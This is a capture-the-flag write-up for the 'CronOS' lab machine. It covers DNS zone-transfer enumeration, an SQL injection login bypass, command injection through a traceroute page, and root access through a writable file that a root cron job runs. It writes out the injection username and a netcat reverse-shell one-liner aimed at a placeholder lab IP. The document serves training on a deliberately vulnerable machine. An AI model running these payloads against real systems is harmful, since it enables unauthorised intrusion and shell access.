CronOS

​ ​ October 2017 / Document No D17.100.18

13​th​
Prepared By: Alexander Reid (Arrexel)
Machine Author: ch4p
Difficulty: ​Medium
Classification: Official

Page 1 / 7
SYNOPSIS
CronOS focuses mainly on different vectors for enumeration and also emphasises the risks
associated with adding world-writable files to the root crontab. This machine also includes an
introductory-level SQL injection vulnerability.

Skills Required Skills Learned

● Basic knowledge of Linux ● SQL Injection

● Enumerating ports and services ● Command injection
● Enumerating DNS ● Exploiting cron jobs

Page 2 / 7
Enumeration

Nmap

Nmap reveals an OpenSSH server, a DNS server and an Apache server. Attempting to view the
website reveals only the default Apache page.

Page 3 / 7
Dig

Although the initial domain name must be guessed (​cronos.htb​​), it is possible to enumerate the
remaining subdomains by doing a zone transfer. This can be accomplished with the command
dig axfr @10.10.10.13 cronos.htb​​ after adding ​cronos.htb​​ to the ​/etc/hosts​​ file.

After adding ​admin.cronos.htb​​ to the ​/etc/hosts ​file and browsing to it, an administrator login
page is presented.

Page 4 / 7
Exploitation

Login
After some trial and error, it appears that the ​Username​​ field is vulnerable to SQL injection. By
commenting out the rest of the statement with the username ​admin’-- -​​ the login form is
bypassed.

Welcome

It does not take long to figure out that the ​welcome.php​​ page is vulnerable to command
injection. Many different methods work here, however the simplest is likely just using a semicolon
to add additional commands. However, script execution is stopped after the traceroute is run.

Page 5 / 7
By intercepting the response in Burp Suite, it is possible to modify the command entirely.

After removing the host variable, command injection is now trivial. Replace ​traceroute ​with the
desired command and send the request. Note that URL encoding the command is required in
some cases. Use the command ​rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LAB IP>
<PORT>| >/tmp/f ​to connect to a local ​nc​​ listener, which can be started by using the command ​nc
-nvlp <PORT>

The user flag can be obtained from ​/home/noulis/user.txt

Page 6 / 7
Privilege Escalation

LinEnum: ​https://github.com/rebootuser/LinEnum

Running LinEnum generates a fairly large list of information. One thing that stands out is the root
crontab, which runs the ​schedule()​​ function in ​/var/www/laravel/app/console/Kernel.php​​.
Modifying the function allows for command execution as root by the scheduler system.

This can be used to modify other files to simplify obtaining a root shell, however in this case
obtaining the flag is all that is required.

Page 7 / 7